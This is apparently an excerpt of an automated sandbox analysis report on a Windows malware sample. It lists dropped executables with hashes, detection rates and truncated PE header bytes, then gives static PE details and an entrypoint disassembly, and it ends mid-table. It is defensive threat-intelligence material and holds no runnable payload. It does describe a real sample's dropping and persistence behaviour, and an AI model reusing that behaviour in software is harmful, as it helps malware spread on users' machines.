                                                                                                                                                                                                    SHA-512:35A97610BF41FED4D3A8EE7EEE7E4403CC587B550B286854A62EEAE0353BE4C84625D1B30E1083E5DD60DB1F8788D0AF940162E10C314ABC731981375B143E11
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z<...R...R...R..I...R..I.g.R...)...R...S.>.R..I...R..I...R..I...R.Rich..R.........PE..L....._..........................................@.................................$3..........................................(...................................................................0...@...............@............................text...b........................... ..`.data...............................@....dubom..............................@....xak................................@....zawaxig............................@....rsrc................$..............@..@.reloc...G.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\E5C8.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):905216
                                                                                                                                                                                                    Entropy (8bit):7.399713113456654
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                                    MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                    SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                                    SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                                    SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\F6C0.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):373760
                                                                                                                                                                                                    Entropy (8bit):6.990411328206368
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                                                                                                                    MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                                                                                                                    SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                                                                                                                    SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                                                                                                                    SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\F805.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):301056
                                                                                                                                                                                                    Entropy (8bit):5.192330972647351
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                                                                                                    MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                    SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                                                                                                    SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                                                                                                    SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tvdcssmj.exe
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\743F.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11360768
                                                                                                                                                                                                    Entropy (8bit):3.81005892864825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:PgjJDJ13d07SuLbkayXpkU9xb1V2PyiORsBe:Pgj/13d4lkXWsxRV25OR
                                                                                                                                                                                                    MD5:AB58CC4BF8687E3F671DAC84A0675E96
                                                                                                                                                                                                    SHA1:8221652C8A4EA2EB2FCC1FB4DA17D74AD23D91D9
                                                                                                                                                                                                    SHA-256:4162CC11CC30F7DB7C8A151252A7E63E78DD4C03C995E2AB6E225DC811B8FD48
                                                                                                                                                                                                    SHA-512:3EB09EE0A43631D53B6364D4D8CBBE9CEEBE9D2CA5DCC2F1022F75BDA4232223C0F98E9FDC804BCE8642BBC50C4FEE9E1D79DB655D3F729EAE5393B55D6BF150
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z<...R...R...R..I...R..I.g.R...)...R...S.>.R..I...R..I...R..I...R.Rich..R.........PE..L....n._............................ .............@.................................T.......................................T...(...................................................................0...@...............@............................text............................... ..`.data...............................@....lemel..............................@....lobil..............................@....cixu...............................@....rsrc...............................@..@.reloc...F..........................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001YS (copy)
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.11008162512076788
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:26+k1jXm/Ey6q9995qGq3qQ10nMCldimE8eawHjc1F1f:26b4l68MjLyMCldzE9BHjcfd
                                                                                                                                                                                                    MD5:EBCE4E8FF3E15A399552D4690AC37736
                                                                                                                                                                                                    SHA1:79211AAAE61CE12A7C8E53974D5EF0231D3FBF57
                                                                                                                                                                                                    SHA-256:26C30570B0A71B1B711F1618D8F0530F7BD3F6C8C24239C83A499EFA64C65529
                                                                                                                                                                                                    SHA-512:53DB29D3009663FAF11E223BB73E6DD4CD549C7EFD29834F77EF495BE4BC9A3FC3F976D0B5EF86EC306FB3B8E867C575DBD853D33BF6C6149E70921D35D4B796
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ................................................................................T...X....T3@.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... ......._jF...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.T...X...M\3@....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.1125318481978825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:L0jXm/Ey6q9995qQ1miM3qQ10nMCldimE8eawHza1miI80P:tl68MQ1tMLyMCldzE9BHza1tI8k
                                                                                                                                                                                                    MD5:9C90F06CC6ACB3A8B7C71F4B9E3EC5A3
                                                                                                                                                                                                    SHA1:805FAA6F88EBD4C2CF661944EE2B62A41AAF2FBB
                                                                                                                                                                                                    SHA-256:3A5F2158913B717BADB36A34B9084E5FF33C8E7D9727ED520A3C24EF69C3DC1A
                                                                                                                                                                                                    SHA-512:4147E871711095822EA66BDCFB5BAA56DAC86493614B40A1A7299C3F175EE669D8648741A2D73F9A14FF920353B627AADFB1285D1D20922061BD49B0EF9D0558
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ................................................................................T...X....T2@.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... ......._jF...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.T...X...I\2@....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001d. (copy)
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.11262246064646632
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:ttsjXm/Ey6q9995qGu1mK2P3qQ10nMCldimE8eawHza1mKstP:xl68MGu1iPLyMCldzE9BHza14F
                                                                                                                                                                                                    MD5:68886B0A5811A0A2CD8E4FE4F8F7B79B
                                                                                                                                                                                                    SHA1:AD7CA336D3562569DC0A4BEF29726F31DDC4285D
                                                                                                                                                                                                    SHA-256:810E1C295F835F33BCD2A363AA3EA3D1262324C9881D8EF01A9C8DAEE8119558
                                                                                                                                                                                                    SHA-512:51E02165BFCAC995F975258532F924462B9B13CBC0A57E0E736A6B59729C936855885461593DF5A9364BCEEA51A5B2504177EED9F668740442A87BAA939D1522
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ................................................................................T...X...3.1@.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... .......XjF...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.T...X....1@....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\rwjfsvd
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):320000
                                                                                                                                                                                                    Entropy (8bit):6.688755474337002
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:f4QIFL5D8E3weiB+aHjHvEaTvpwr9UopI2wPgnPHPYU:wQQp8yweXUvEkSJUaI2vnP
                                                                                                                                                                                                    MD5:B45BF93A4B27690392433619C5006E8B
                                                                                                                                                                                                    SHA1:9EC3AD4B028AB127E71FD755263DD0AA8A17260E
                                                                                                                                                                                                    SHA-256:E997341AB2422F5471F4C9F1DF84F7A52E16FA38D64E6E0F4F94859CC234E2F8
                                                                                                                                                                                                    SHA-512:42F31ACF12BDF50AB9A5525D31157C6E9C09C1013CD4502A0DEDB5A339EC6D5AB6AA268073CF05B25FBE662F5066086ADD8B7701DE9010AACC0E4EAFEBECB275
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z<...R...R...R..I...R..I.g.R...)...R...S.>.R..I...R..I...R..I...R.Rich..R.........PE..L....B.`..........................................@.................................O...........................................(...................................................................0...@...............@............................text...2........................... ..`.data...............................@....semunil............................@....wanexic............................@....sutolac............................@....rsrc...............................@..@.reloc...F.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\rwjfsvd:Zone.Identifier
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220114_125823_481.etl
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                    Entropy (8bit):3.37996320573133
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:hCBjh/o+DzY5Ol09f/YxhHCwEII2l19T1ky5O4Y618T2vjFzHNMCGdJR4j5N:Qzw3Ft2/4ZC2e
                                                                                                                                                                                                    MD5:31C5A57ACE4EC5D40EAA7DD3CE59FFEC
                                                                                                                                                                                                    SHA1:668A6BB005B79A1F117D136F275301AA8D256D91
                                                                                                                                                                                                    SHA-256:45AF3E33BD3FBAB4101529BF74FF10C2AAC32583C6BE8F0D631E161143C57CEE
                                                                                                                                                                                                    SHA-512:8A60380A42FA9BBEAE1338430417CB14B95B8C44771E43AB3358BB2E717FB3955A4B1AF3BEC4CC9938610C1DB2DA8E5512927371D62B5D86F464A51497770D65
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .... ... ....................................... ...!............................................................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ........iF...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.4._.1.2.5.8.2.3._.4.8.1...e.t.l.........P.P.................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe (copy)
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11360768
                                                                                                                                                                                                    Entropy (8bit):3.81005892864825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:PgjJDJ13d07SuLbkayXpkU9xb1V2PyiORsBe:Pgj/13d4lkXWsxRV25OR
                                                                                                                                                                                                    MD5:AB58CC4BF8687E3F671DAC84A0675E96
                                                                                                                                                                                                    SHA1:8221652C8A4EA2EB2FCC1FB4DA17D74AD23D91D9
                                                                                                                                                                                                    SHA-256:4162CC11CC30F7DB7C8A151252A7E63E78DD4C03C995E2AB6E225DC811B8FD48
                                                                                                                                                                                                    SHA-512:3EB09EE0A43631D53B6364D4D8CBBE9CEEBE9D2CA5DCC2F1022F75BDA4232223C0F98E9FDC804BCE8642BBC50C4FEE9E1D79DB655D3F729EAE5393B55D6BF150
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z<...R...R...R..I...R..I.g.R...)...R...S.>.R..I...R..I...R..I...R.Rich..R.........PE..L....n._............................ .............@.................................T.......................................T...(...................................................................0...@...............@............................text............................... ..`.data...............................@....lemel..............................@....lobil..............................@....cixu...............................@....rsrc...............................@..@.reloc...F..........................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):6.688755474337002
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                    File name:eIxMVDoQF3.exe
                                                                                                                                                                                                    File size:320000
                                                                                                                                                                                                    MD5:b45bf93a4b27690392433619c5006e8b
                                                                                                                                                                                                    SHA1:9ec3ad4b028ab127e71fd755263dd0aa8a17260e
                                                                                                                                                                                                    SHA256:e997341ab2422f5471f4c9f1df84f7a52e16fa38d64e6e0f4f94859cc234e2f8
                                                                                                                                                                                                    SHA512:42f31acf12bdf50ab9a5525d31157c6e9c09c1013cd4502a0dedb5a339ec6d5ab6aa268073cf05b25fbe662f5066086add8b7701de9010aacc0e4eafebecb275
                                                                                                                                                                                                    SSDEEP:6144:f4QIFL5D8E3weiB+aHjHvEaTvpwr9UopI2wPgnPHPYU:wQQp8yweXUvEkSJUaI2vnP
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z<...R...R...R..I....R..I..g.R...)...R...S.>.R..I....R..I....R..I....R.Rich..R.........PE..L....B.`...........................

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:c8d0d8e0f8f0f4e8

                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Entrypoint:0x41b6a0
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                                    Time Stamp:0x60A442A2 [Tue May 18 22:41:38 2021 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:1edccb2e6808b6fbc3aa19660b738ec5

                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    mov edi, edi
                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                    call 00007F4F21129A7Bh
                                                                                                                                                                                                    call 00007F4F2111CB66h
                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    mov edi, edi
                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                    push FFFFFFFEh
                                                                                                                                                                                                    push 0043DCA8h
                                                                                                                                                                                                    push 0041E880h
                                                                                                                                                                                                    mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                    push eax
                                                                                                                                                                                                    add esp, FFFFFF94h
                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                    push esi
                                                                                                                                                                                                    push edi
                                                                                                                                                                                                    mov eax, dword ptr [00440354h]
                                                                                                                                                                                                    xor dword ptr [ebp-08h], eax
                                                                                                                                                                                                    xor eax, ebp
                                                                                                                                                                                                    push eax
                                                                                                                                                                                                    lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                                    mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                    mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                    mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                                    mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                    lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                                    push eax
                                                                                                                                                                                                    call dword ptr [004010A0h]
                                                                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                    jmp 00007F4F2111CB78h
                                                                                                                                                                                                    mov eax, 00000001h
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    mov esp, dword ptr [ebp-18h]
                                                                                                                                                                                                    mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                    mov eax, dword ptr [ebp-78h]
                                                                                                                                                                                                    jmp 00007F4F2111CCA7h
                                                                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                    call 00007F4F2111CCE4h
                                                                                                                                                                                                    mov dword ptr [ebp-6Ch], eax
                                                                                                                                                                                                    push 00000001h
                                                                                                                                                                                                    call 00007F4F2112A46Ah
                                                                                                                                                                                                    add esp, 04h
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    jne 00007F4F2111CB5Ch
                                                                                                                                                                                                    push 0000001Ch
                                                                                                                                                                                                    call 00007F4F2111CC9Ch
                                                                                                                                                                                                    add esp, 04h
                                                                                                                                                                                                    call 00007F4F21125C44h
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    jne 00007F4F2111CB5Ch
                                                                                                                                                                                                    push 00000010h

                                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                                                                                    • [C++] VS2008 build 21022

                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3d40x28.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1600000x83b8.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1690000x1e0c.reloc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x13900x1c.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91300x40.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x340.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                    Sections

                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000x3e7320x3e800False0.58246875data6.96128560054IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .data0x400000x11c9880x1800False0.34033203125data3.4654687142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .semunil0x15d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .wanexic0x15e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
